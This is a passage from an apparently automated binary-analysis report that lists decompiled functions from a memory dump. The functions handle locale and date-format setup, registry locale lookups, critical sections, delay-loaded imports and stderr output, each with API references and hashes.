                                                                    • Source File: 00000009.00000002.319564629.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000009.00000002.319540262.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319752753.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319806928.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319842191.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319861378.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: AddressHandleModuleProc$CriticalInitializeSectionVersion
                                                                    • String ID: GetThreadPreferredUILanguages$GetThreadUILanguage$SetThreadPreferredUILanguages$kernel32.dll
                                                                    • API String ID: 74573329-1403180336
                                                                    • Opcode ID: 58d327082e64ef42c945ef42cd8e374577ec01c28157982806072b66866d47a0
                                                                    • Instruction ID: d84369935ce7e940d286def53580bf621e493dc20acbcc0033f4522394103be5
                                                                    • Opcode Fuzzy Hash: 58d327082e64ef42c945ef42cd8e374577ec01c28157982806072b66866d47a0
                                                                    • Instruction Fuzzy Hash: F9F098A49853413DD6207F769D07B292D685A0170AF644AFFB410763D3EEFE4190E71E
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0041E0AC, Relevance: 17.7, APIs: 2, Strings: 8, Instructions: 216threadCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 71%
                                                                    			E0041E0AC(int __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __fp0) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				int _t55;
				void* _t121;
				void* _t128;
				void* _t151;
				void* _t152;
				intOrPtr _t172;
				intOrPtr _t204;
				signed short _t212;
				int _t214;
				intOrPtr _t216;
				intOrPtr _t217;
				void* _t224;

				_t224 = __fp0;
				_t211 = __edi;
				_t216 = _t217;
				_t152 = 7;
				do {
					_push(0);
					_push(0);
					_t152 = _t152 - 1;
				} while (_t152 != 0);
				_push(__edi);
				_t151 = __edx;
				_t214 = __eax;
				_push(_t216);
				_push(0x41e391);
				_push( *[fs:eax]);
				 *[fs:eax] = _t217;
				_t55 = IsValidLocale(__eax, 1);
				_t219 = _t55;
				if(_t55 == 0) {
					_t214 = GetThreadLocale();
				}
				_t172 =  *0x416f50; // 0x416f54
				E00409D24(_t151 + 0xbc, _t172);
				E0041E7CC(_t214, _t151, _t151, _t211, _t214, _t224);
				E0041E4A0(_t214, _t151, _t151, _t211, _t214);
				E0041E55C(_t214, _t151, _t151, _t211, _t214);
				E0041E034(_t214, 0, 0x14,  &_v20);
				E00407E00(_t151, _v20);
				E0041E034(_t214, 0x41e3ac, 0x1b,  &_v24);
				 *((char*)(_t151 + 4)) = E0041A1C4(0x41e3ac, 0, _t219);
				E0041E034(_t214, 0x41e3ac, 0x1c,  &_v28);
				 *((char*)(_t151 + 0xc6)) = E0041A1C4(0x41e3ac, 0, _t219);
				 *((short*)(_t151 + 0xc0)) = E0041E080(_t214, 0x2c, 0xf);
				 *((short*)(_t151 + 0xc2)) = E0041E080(_t214, 0x2e, 0xe);
				E0041E034(_t214, 0x41e3ac, 0x19,  &_v32);
				 *((char*)(_t151 + 5)) = E0041A1C4(0x41e3ac, 0, _t219);
				_t212 = E0041E080(_t214, 0x2f, 0x1d);
				 *(_t151 + 6) = _t212;
				_push(_t212);
				E0041EB18(_t214, _t151, L"m/d/yy", 0x1f, _t212, _t214, _t219,  &_v36);
				E00407E00(_t151 + 0xc, _v36);
				_push( *(_t151 + 6) & 0x0000ffff);
				E0041EB18(_t214, _t151, L"mmmm d, yyyy", 0x20, _t212, _t214, _t219,  &_v40);
				E00407E00(_t151 + 0x10, _v40);
				 *((short*)(_t151 + 8)) = E0041E080(_t214, 0x3a, 0x1e);
				E0041E034(_t214, 0x41e400, 0x28,  &_v44);
				E00407E00(_t151 + 0x14, _v44);
				E0041E034(_t214, 0x41e414, 0x29,  &_v48);
				E00407E00(_t151 + 0x18, _v48);
				E00407A20( &_v12);
				E00407A20( &_v16);
				E0041E034(_t214, 0x41e3ac, 0x25,  &_v52);
				_t121 = E0041A1C4(0x41e3ac, 0, _t219);
				_t220 = _t121;
				if(_t121 != 0) {
					E00407E48( &_v8, 0x41e438);
				} else {
					E00407E48( &_v8, 0x41e428);
				}
				E0041E034(_t214, 0x41e3ac, 0x23,  &_v56);
				_t128 = E0041A1C4(0x41e3ac, 0, _t220);
				_t221 = _t128;
				if(_t128 == 0) {
					E0041E034(_t214, 0x41e3ac, 0x1005,  &_v60);
					if(E0041A1C4(0x41e3ac, 0, _t221) != 0) {
						E00407E48( &_v12, L"AMPM ");
					} else {
						E00407E48( &_v16, L" AMPM");
					}
				}
				_push(_v12);
				_push(_v8);
				_push(":mm");
				_push(_v16);
				E004087C4(_t151 + 0x1c, _t151, 4, _t212, _t214);
				_push(_v12);
				_push(_v8);
				_push(L":mm:ss");
				_push(_v16);
				E004087C4(_t151 + 0x20, _t151, 4, _t212, _t214);
				 *((short*)(_t151 + 0xa)) = E0041E080(_t214, 0x2c, 0xc);
				 *((short*)(_t151 + 0xc4)) = 0x32;
				_pop(_t204);
				 *[fs:eax] = _t204;
				_push(0x41e398);
				return E00407A80( &_v60, 0xe);
			}





























                                                                    0x0041e0ac
                                                                    0x0041e0ac
                                                                    0x0041e0ad
                                                                    0x0041e0af
                                                                    0x0041e0b4
                                                                    0x0041e0b4
                                                                    0x0041e0b6
                                                                    0x0041e0b8
                                                                    0x0041e0b8
                                                                    0x0041e0bd
                                                                    0x0041e0be
                                                                    0x0041e0c0
                                                                    0x0041e0c4
                                                                    0x0041e0c5
                                                                    0x0041e0ca
                                                                    0x0041e0cd
                                                                    0x0041e0d3
                                                                    0x0041e0d8
                                                                    0x0041e0da
                                                                    0x0041e0e1
                                                                    0x0041e0e1
                                                                    0x0041e0e9
                                                                    0x0041e0ef
                                                                    0x0041e0f8
                                                                    0x0041e101
                                                                    0x0041e10a
                                                                    0x0041e11c
                                                                    0x0041e126
                                                                    0x0041e13b
                                                                    0x0041e14a
                                                                    0x0041e15d
                                                                    0x0041e16c
                                                                    0x0041e182
                                                                    0x0041e199
                                                                    0x0041e1b0
                                                                    0x0041e1bf
                                                                    0x0041e1d2
                                                                    0x0041e1d4
                                                                    0x0041e1d8
                                                                    0x0041e1e9
                                                                    0x0041e1f4
                                                                    0x0041e1fd
                                                                    0x0041e20e
                                                                    0x0041e219
                                                                    0x0041e22e
                                                                    0x0041e242
                                                                    0x0041e24d
                                                                    0x0041e262
                                                                    0x0041e26d
                                                                    0x0041e275
                                                                    0x0041e27d
                                                                    0x0041e292
                                                                    0x0041e29c
                                                                    0x0041e2a1
                                                                    0x0041e2a3
                                                                    0x0041e2bc
                                                                    0x0041e2a5
                                                                    0x0041e2ad
                                                                    0x0041e2ad
                                                                    0x0041e2d1
                                                                    0x0041e2db
                                                                    0x0041e2e0
                                                                    0x0041e2e2
                                                                    0x0041e2f4
                                                                    0x0041e305
                                                                    0x0041e31e
                                                                    0x0041e307
                                                                    0x0041e30f
                                                                    0x0041e30f
                                                                    0x0041e305
                                                                    0x0041e323
                                                                    0x0041e326
                                                                    0x0041e329
                                                                    0x0041e32e
                                                                    0x0041e339
                                                                    0x0041e33e
                                                                    0x0041e341
                                                                    0x0041e344
                                                                    0x0041e349
                                                                    0x0041e354
                                                                    0x0041e369
                                                                    0x0041e36d
                                                                    0x0041e378
                                                                    0x0041e37b
                                                                    0x0041e37e
                                                                    0x0041e390

                                                                    APIs
                                                                    • IsValidLocale.KERNEL32(?,00000001,00000000,0041E391,?,?,?,?,00000000,00000000), ref: 0041E0D3
                                                                    • GetThreadLocale.KERNEL32(?,00000001,00000000,0041E391,?,?,?,?,00000000,00000000), ref: 0041E0DC
                                                                      • Part of subcall function 0041E080: GetLocaleInfoW.KERNEL32(?,0000000F,?,00000002,0000002C,?,?,?,0041E182,?,00000001,00000000,0041E391), ref: 0041E093
                                                                      • Part of subcall function 0041E034: GetLocaleInfoW.KERNEL32(?,?,?,00000100), ref: 0041E052
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.319564629.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000009.00000002.319540262.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319752753.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319806928.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319842191.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319861378.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Locale$Info$ThreadValid
                                                                    • String ID: AMPM$2$:mm$:mm:ss$AMPM $ToA$m/d/yy$mmmm d, yyyy
                                                                    • API String ID: 233154393-2808312488
                                                                    • Opcode ID: 89dbd54baef797781c63ab5ee0a362cfcea0ac090ff54d53303b749289e312d8
                                                                    • Instruction ID: 756c878950b08f5201d8436663b045c7a1b9734561897f0b9d621fb0846820d7
                                                                    • Opcode Fuzzy Hash: 89dbd54baef797781c63ab5ee0a362cfcea0ac090ff54d53303b749289e312d8
                                                                    • Instruction Fuzzy Hash: 887134387011199BDB05EB67C841BDE76AADF88304F50807BF904AB246DB3DDD82879E
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040A7E4, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 76COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 71%
                                                                    			E0040A7E4(signed short __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
				char _v8;
				void* _t18;
				signed short _t28;
				intOrPtr _t35;
				intOrPtr* _t44;
				intOrPtr _t47;

				_t42 = __edi;
				_push(0);
				_push(__ebx);
				_push(__esi);
				_t44 = __edx;
				_t28 = __eax;
				_push(_t47);
				_push(0x40a8e8);
				_push( *[fs:eax]);
				 *[fs:eax] = _t47;
				EnterCriticalSection(0x4bdc10);
				if(_t28 !=  *0x4bdc28) {
					LeaveCriticalSection(0x4bdc10);
					E00407A20(_t44);
					if(IsValidLocale(_t28 & 0x0000ffff, 2) != 0) {
						if( *0x4bdc0c == 0) {
							_t18 = E0040A4CC(_t28, _t28, _t44, __edi, _t44);
							L00403738();
							if(_t28 != _t18) {
								if( *_t44 != 0) {
									_t18 = E004086E4(_t44, E0040A900);
								}
								L00403738();
								E0040A4CC(_t18, _t28,  &_v8, _t42, _t44);
								E004086E4(_t44, _v8);
							}
						} else {
							E0040A6C8(_t28, _t44);
						}
					}
					EnterCriticalSection(0x4bdc10);
					 *0x4bdc28 = _t28;
					E0040A34C(0x4bdc2a, E004084EC( *_t44), 0xaa);
					LeaveCriticalSection(0x4bdc10);
				} else {
					E0040858C(_t44, 0x55, 0x4bdc2a);
					LeaveCriticalSection(0x4bdc10);
				}
				_pop(_t35);
				 *[fs:eax] = _t35;
				_push(E0040A8EF);
				return E00407A20( &_v8);
			}









                                                                    0x0040a7e4
                                                                    0x0040a7e7
                                                                    0x0040a7e9
                                                                    0x0040a7ea
                                                                    0x0040a7eb
                                                                    0x0040a7ed
                                                                    0x0040a7f1
                                                                    0x0040a7f2
                                                                    0x0040a7f7
                                                                    0x0040a7fa
                                                                    0x0040a802
                                                                    0x0040a80e
                                                                    0x0040a835
                                                                    0x0040a83c
                                                                    0x0040a84e
                                                                    0x0040a857
                                                                    0x0040a868
                                                                    0x0040a86d
                                                                    0x0040a875
                                                                    0x0040a87a
                                                                    0x0040a883
                                                                    0x0040a883
                                                                    0x0040a888
                                                                    0x0040a890
                                                                    0x0040a89a
                                                                    0x0040a89a
                                                                    0x0040a859
                                                                    0x0040a85d
                                                                    0x0040a85d
                                                                    0x0040a857
                                                                    0x0040a8a4
                                                                    0x0040a8a9
                                                                    0x0040a8c3
                                                                    0x0040a8cd
                                                                    0x0040a810
                                                                    0x0040a81c
                                                                    0x0040a826
                                                                    0x0040a826
                                                                    0x0040a8d4
                                                                    0x0040a8d7
                                                                    0x0040a8da
                                                                    0x0040a8e7

                                                                    APIs
                                                                    • EnterCriticalSection.KERNEL32(004BDC10,00000000,0040A8E8,?,?,?,00000000,?,0040B1C8,00000000,0040B227,?,?,00000000,00000000,00000000), ref: 0040A802
                                                                    • LeaveCriticalSection.KERNEL32(004BDC10,004BDC10,00000000,0040A8E8,?,?,?,00000000,?,0040B1C8,00000000,0040B227,?,?,00000000,00000000), ref: 0040A826
                                                                    • LeaveCriticalSection.KERNEL32(004BDC10,004BDC10,00000000,0040A8E8,?,?,?,00000000,?,0040B1C8,00000000,0040B227,?,?,00000000,00000000), ref: 0040A835
                                                                    • IsValidLocale.KERNEL32(00000000,00000002,004BDC10,004BDC10,00000000,0040A8E8,?,?,?,00000000,?,0040B1C8,00000000,0040B227), ref: 0040A847
                                                                    • EnterCriticalSection.KERNEL32(004BDC10,00000000,00000002,004BDC10,004BDC10,00000000,0040A8E8,?,?,?,00000000,?,0040B1C8,00000000,0040B227), ref: 0040A8A4
                                                                    • LeaveCriticalSection.KERNEL32(004BDC10,004BDC10,00000000,00000002,004BDC10,004BDC10,00000000,0040A8E8,?,?,?,00000000,?,0040B1C8,00000000,0040B227), ref: 0040A8CD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.319564629.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000009.00000002.319540262.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319752753.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319806928.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319842191.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319861378.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CriticalSection$Leave$Enter$LocaleValid
                                                                    • String ID: en-US,en,
                                                                    • API String ID: 975949045-3579323720
                                                                    • Opcode ID: e3721d42ea745a9edd8ebaecb4ab5b2828546a05d0e92c0f55165f56426ca85b
                                                                    • Instruction ID: af4c48ae6f9d4b9345a2e7437780db60bfff4a38cfd5d6d0e3948ff18df55379
                                                                    • Opcode Fuzzy Hash: e3721d42ea745a9edd8ebaecb4ab5b2828546a05d0e92c0f55165f56426ca85b
                                                                    • Instruction Fuzzy Hash: 31218461B1031077DA11BB668C03B5E29A89B44705BA0887BB140B32D2EEBD8D52D66F
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0042301C, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 82registryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 61%
                                                                    			E0042301C(void* __ebx, void* __esi, void* __eflags) {
				char _v8;
				void* _v12;
				char _v16;
				char _v20;
				intOrPtr* _t21;
				intOrPtr _t61;
				void* _t68;

				_push(__ebx);
				_v20 = 0;
				_v8 = 0;
				_push(_t68);
				_push(0x423116);
				_push( *[fs:eax]);
				 *[fs:eax] = _t68 + 0xfffffff0;
				_t21 = E0040E1A8(__ebx, __esi, GetModuleHandleW(L"kernel32.dll"), L"GetUserDefaultUILanguage");
				if(_t21 == 0) {
					if(E0041FF2C() != 2) {
						if(E00422FF4(0, L"Control Panel\\Desktop\\ResourceLocale", 0x80000001,  &_v12, 1, 0) == 0) {
							E00422FE8();
							RegCloseKey(_v12);
						}
					} else {
						if(E00422FF4(0, L".DEFAULT\\Control Panel\\International", 0x80000003,  &_v12, 1, 0) == 0) {
							E00422FE8();
							RegCloseKey(_v12);
						}
					}
					E0040873C( &_v20, _v8, 0x42322c);
					E00405920(_v20,  &_v16);
					if(_v16 != 0) {
					}
				} else {
					 *_t21();
				}
				_pop(_t61);
				 *[fs:eax] = _t61;
				_push(E0042311D);
				E00407A20( &_v20);
				return E00407A20( &_v8);
			}










                                                                    0x00423022
                                                                    0x00423025
                                                                    0x00423028
                                                                    0x0042302d
                                                                    0x0042302e
                                                                    0x00423033
                                                                    0x00423036
                                                                    0x00423049
                                                                    0x00423050
                                                                    0x00423063
                                                                    0x004230b8
                                                                    0x004230c5
                                                                    0x004230ce
                                                                    0x004230ce
                                                                    0x00423065
                                                                    0x00423080
                                                                    0x0042308d
                                                                    0x00423096
                                                                    0x00423096
                                                                    0x00423080
                                                                    0x004230de
                                                                    0x004230e9
                                                                    0x004230f4
                                                                    0x004230f4
                                                                    0x00423052
                                                                    0x00423052
                                                                    0x00423054
                                                                    0x004230fa
                                                                    0x004230fd
                                                                    0x00423100
                                                                    0x00423108
                                                                    0x00423115

                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,00423116), ref: 00423043
                                                                      • Part of subcall function 0040E1A8: GetProcAddress.KERNEL32(?,00423116), ref: 0040E1D2
                                                                    • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,00423116), ref: 00423096
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.319564629.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000009.00000002.319540262.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319752753.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319806928.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319842191.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319861378.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: AddressCloseHandleModuleProc
                                                                    • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
                                                                    • API String ID: 4190037839-2401316094
                                                                    • Opcode ID: 0c53a133d6644a1b94ef3c959f72937b5652b11bdcaf1ce6cf384129006bdbe5
                                                                    • Instruction ID: 05790bdd6973bc135d390eb6e5b6569f0703c8ea8b4006eead18837270f0a894
                                                                    • Opcode Fuzzy Hash: 0c53a133d6644a1b94ef3c959f72937b5652b11bdcaf1ce6cf384129006bdbe5
                                                                    • Instruction Fuzzy Hash: 39217930B00228ABDB10EEB5DD42A9F73F4EB44345FA04477A500E3281DB7CAB41962D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040D218, Relevance: 13.8, APIs: 9, Instructions: 258COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 67%
                                                                    			E0040D218(void* __eflags, intOrPtr _a4, intOrPtr* _a8) {
				long _v8;
				signed int _v12;
				long _v16;
				void* _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				struct HINSTANCE__** _v48;
				CHAR* _v52;
				void _v56;
				long _v60;
				_Unknown_base(*)()* _v64;
				struct HINSTANCE__* _v68;
				CHAR* _v72;
				signed int _v76;
				CHAR* _v80;
				intOrPtr* _v84;
				void* _v88;
				void _v92;
				signed int _t104;
				signed int _t106;
				signed int _t108;
				long _t113;
				intOrPtr* _t119;
				void* _t124;
				void _t126;
				long _t128;
				struct HINSTANCE__* _t142;
				long _t166;
				signed int* _t190;
				_Unknown_base(*)()* _t191;
				void* _t194;
				intOrPtr _t196;

				_push(_a4);
				memcpy( &_v56, 0x4b7c40, 8 << 2);
				_pop(_t194);
				_v56 =  *0x4b7c40;
				_v52 = E0040D6C8( *0x004B7C44);
				_v48 = E0040D6D8( *0x004B7C48);
				_v44 = E0040D6E8( *0x004B7C4C);
				_v40 = E0040D6F8( *0x004B7C50);
				_v36 = E0040D6F8( *0x004B7C54);
				_v32 = E0040D6F8( *0x004B7C58);
				_v28 =  *0x004B7C5C;
				memcpy( &_v92, 0x4b7c60, 9 << 2);
				_t196 = _t194;
				_v88 = 0x4b7c60;
				_v84 = _a8;
				_v80 = _v52;
				if((_v56 & 0x00000001) == 0) {
					_t166 =  *0x4b7c84; // 0x0
					_v8 = _t166;
					_v8 =  &_v92;
					RaiseException(0xc06d0057, 0, 1,  &_v8);
					return 0;
				}
				_t104 = _a8 - _v44;
				_t142 =  *_v48;
				if(_t104 < 0) {
					_t104 = _t104 + 3;
				}
				_v12 = _t104 >> 2;
				_t106 = _v12;
				_t190 = (_t106 << 2) + _v40;
				_t108 = (_t106 & 0xffffff00 | (_t190[0] & 0x00000080) == 0x00000000) & 0x00000001;
				_v76 = _t108;
				if(_t108 == 0) {
					_v72 =  *_t190 & 0x0000ffff;
				} else {
					_v72 = E0040D708( *_t190) + 2;
				}
				_t191 = 0;
				if( *0x4be640 == 0) {
					L10:
					if(_t142 != 0) {
						L25:
						_v68 = _t142;
						if( *0x4be640 != 0) {
							_t191 =  *0x4be640(2,  &_v92);
						}
						if(_t191 != 0) {
							L36:
							if(_t191 == 0) {
								_v60 = GetLastError();
								if( *0x4be644 != 0) {
									_t191 =  *0x4be644(4,  &_v92);
								}
								if(_t191 == 0) {
									_t113 =  *0x4b7c8c; // 0x0
									_v24 = _t113;
									_v24 =  &_v92;
									RaiseException(0xc06d007f, 0, 1,  &_v24);
									_t191 = _v64;
								}
							}
							goto L41;
						} else {
							if( *((intOrPtr*)(_t196 + 0x14)) == 0 ||  *((intOrPtr*)(_t196 + 0x1c)) == 0) {
								L35:
								_t191 = GetProcAddress(_t142, _v72);
								goto L36;
							} else {
								_t119 =  *((intOrPtr*)(_t142 + 0x3c)) + _t142;
								if( *_t119 != 0x4550 ||  *((intOrPtr*)(_t119 + 8)) != _v28 || (( *(_t119 + 0x34) & 0xffffff00 |  *(_t119 + 0x34) == _t142) & 0x00000001) == 0) {
									goto L35;
								} else {
									_t191 =  *((intOrPtr*)(_v36 + _v12 * 4));
									if(_t191 == 0) {
										goto L35;
									}
									L41:
									 *_a8 = _t191;
									goto L42;
								}
							}
						}
					}
					if( *0x4be640 != 0) {
						_t142 =  *0x4be640(1,  &_v92);
					}
					if(_t142 == 0) {
						_t142 = LoadLibraryA(_v80);
					}
					if(_t142 != 0) {
						L20:
						if(_t142 == E0040CBA0(_v48, _t142)) {
							FreeLibrary(_t142);
						} else {
							if( *((intOrPtr*)(_t196 + 0x18)) != 0) {
								_t124 = LocalAlloc(0x40, 8);
								_v20 = _t124;
								if(_t124 != 0) {
									 *((intOrPtr*)(_v20 + 4)) = _t196;
									_t126 =  *0x4b7c3c; // 0x0
									 *_v20 = _t126;
									 *0x4b7c3c = _v20;
								}
							}
						}
						goto L25;
					} else {
						_v60 = GetLastError();
						if( *0x4be644 != 0) {
							_t142 =  *0x4be644(3,  &_v92);
						}
						if(_t142 != 0) {
							goto L20;
						} else {
							_t128 =  *0x4b7c88; // 0x0
							_v16 = _t128;
							_v16 =  &_v92;
							RaiseException(0xc06d007e, 0, 1,  &_v16);
							return _v64;
						}
					}
				} else {
					_t191 =  *0x4be640(0,  &_v92);
					if(_t191 == 0) {
						goto L10;
					} else {
						L42:
						if( *0x4be640 != 0) {
							_v60 = 0;
							_v68 = _t142;
							_v64 = _t191;
							 *0x4be640(5,  &_v92);
						}
						return _t191;
					}
				}
			}







































                                                                    0x0040d22c
                                                                    0x0040d232
                                                                    0x0040d234
                                                                    0x0040d237
                                                                    0x0040d244
                                                                    0x0040d251
                                                                    0x0040d25e
                                                                    0x0040d26b
                                                                    0x0040d278
                                                                    0x0040d285
                                                                    0x0040d28e
                                                                    0x0040d29c
                                                                    0x0040d29e
                                                                    0x0040d29f
                                                                    0x0040d2a5
                                                                    0x0040d2ab
                                                                    0x0040d2b2
                                                                    0x0040d2b4
                                                                    0x0040d2ba
                                                                    0x0040d2c0
                                                                    0x0040d2d0
                                                                    0x00000000
                                                                    0x0040d2d5
                                                                    0x0040d2e2
                                                                    0x0040d2e7
                                                                    0x0040d2e9
                                                                    0x0040d2eb
                                                                    0x0040d2eb
                                                                    0x0040d2f1
                                                                    0x0040d2f4
                                                                    0x0040d2fc
                                                                    0x0040d306
                                                                    0x0040d309
                                                                    0x0040d30e
                                                                    0x0040d329
                                                                    0x0040d310
                                                                    0x0040d31c
                                                                    0x0040d31c
                                                                    0x0040d32c
                                                                    0x0040d335
                                                                    0x0040d34e
                                                                    0x0040d350
                                                                    0x0040d412
                                                                    0x0040d412
                                                                    0x0040d41c
                                                                    0x0040d42a
                                                                    0x0040d42a
                                                                    0x0040d42e
                                                                    0x0040d47b
                                                                    0x0040d47d
                                                                    0x0040d484
                                                                    0x0040d48e
                                                                    0x0040d49c
                                                                    0x0040d49c
                                                                    0x0040d4a0
                                                                    0x0040d4a2
                                                                    0x0040d4a7
                                                                    0x0040d4ad
                                                                    0x0040d4bd
                                                                    0x0040d4c2
                                                                    0x0040d4c2
                                                                    0x0040d4a0
                                                                    0x00000000
                                                                    0x0040d430
                                                                    0x0040d434
                                                                    0x0040d46f
                                                                    0x0040d479
                                                                    0x00000000
                                                                    0x0040d43c
                                                                    0x0040d43f
                                                                    0x0040d447
                                                                    0x00000000
                                                                    0x0040d460
                                                                    0x0040d466
                                                                    0x0040d46b
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040d4c5
                                                                    0x0040d4c8
                                                                    0x00000000
                                                                    0x0040d4c8
                                                                    0x0040d447
                                                                    0x0040d434
                                                                    0x0040d42e
                                                                    0x0040d35d
                                                                    0x0040d36b
                                                                    0x0040d36b
                                                                    0x0040d36f
                                                                    0x0040d37a
                                                                    0x0040d37a
                                                                    0x0040d37e
                                                                    0x0040d3cb
                                                                    0x0040d3d7
                                                                    0x0040d40d
                                                                    0x0040d3d9
                                                                    0x0040d3dd
                                                                    0x0040d3e3
                                                                    0x0040d3e8
                                                                    0x0040d3ed
                                                                    0x0040d3f4
                                                                    0x0040d3fa
                                                                    0x0040d3ff
                                                                    0x0040d404
                                                                    0x0040d404
                                                                    0x0040d3ed
                                                                    0x0040d3dd
                                                                    0x00000000
                                                                    0x0040d380
                                                                    0x0040d385
                                                                    0x0040d38f
                                                                    0x0040d39d
                                                                    0x0040d39d
                                                                    0x0040d3a1
                                                                    0x00000000
                                                                    0x0040d3a3
                                                                    0x0040d3a3
                                                                    0x0040d3a8
                                                                    0x0040d3ae
                                                                    0x0040d3be
                                                                    0x00000000
                                                                    0x0040d3c3
                                                                    0x0040d3a1
                                                                    0x0040d337
                                                                    0x0040d343
                                                                    0x0040d347
                                                                    0x00000000
                                                                    0x0040d349
                                                                    0x0040d4ca
                                                                    0x0040d4d1
                                                                    0x0040d4d5
                                                                    0x0040d4d8
                                                                    0x0040d4db
                                                                    0x0040d4e4
                                                                    0x0040d4e4
                                                                    0x00000000
                                                                    0x0040d4ea
                                                                    0x0040d347

                                                                    APIs
                                                                    • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0040D2D0
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.319564629.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000009.00000002.319540262.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319752753.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319806928.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319842191.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319861378.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: ExceptionRaise
                                                                    • String ID:
                                                                    • API String ID: 3997070919-0
                                                                    • Opcode ID: 4fdbadfbff537c598349848257c7330453a14fb024132e1a583ffc8385a63ee1
                                                                    • Instruction ID: 6bdc8742f8c12d3c05e6aa795b4e0fa0c425ed74332de7fca684440f38d882f1
                                                                    • Opcode Fuzzy Hash: 4fdbadfbff537c598349848257c7330453a14fb024132e1a583ffc8385a63ee1
                                                                    • Instruction Fuzzy Hash: 7CA16F75D002089FDB14DFE9D881BAEB7B5BB88300F14423AE505B73C1DB78A949CB59
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004047B0, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 51fileCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 72%
                                                                    			E004047B0(int __eax, void* __ecx, void* __edx) {
				long _v12;
				int _t4;
				long _t7;
				void* _t11;
				long _t12;
				void* _t13;
				long _t18;

				_t4 = __eax;
				_t24 = __edx;
				_t20 = __eax;
				if( *0x4bb058 == 0) {
					_push(0x2010);
					_push(__edx);
					_push(__eax);
					_push(0);
					L00403780();
				} else {
					_t7 = E00407EF0(__edx);
					WriteFile(GetStdHandle(0xfffffff4), _t24, _t7,  &_v12, 0);
					_t11 =  *0x4b7078; // 0x403920
					_t12 = E00407EF0(_t11);
					_t13 =  *0x4b7078; // 0x403920
					WriteFile(GetStdHandle(0xfffffff4), _t13, _t12,  &_v12, 0);
					_t18 = E00407EF0(_t20);
					_t4 = WriteFile(GetStdHandle(0xfffffff4), _t20, _t18,  &_v12, 0);
				}
				return _t4;
			}










                                                                    0x004047b0
                                                                    0x004047b3
                                                                    0x004047b5
                                                                    0x004047be
                                                                    0x00404821
                                                                    0x00404826
                                                                    0x00404827
                                                                    0x00404828
                                                                    0x0040482a
                                                                    0x004047c0
                                                                    0x004047c9
                                                                    0x004047d8
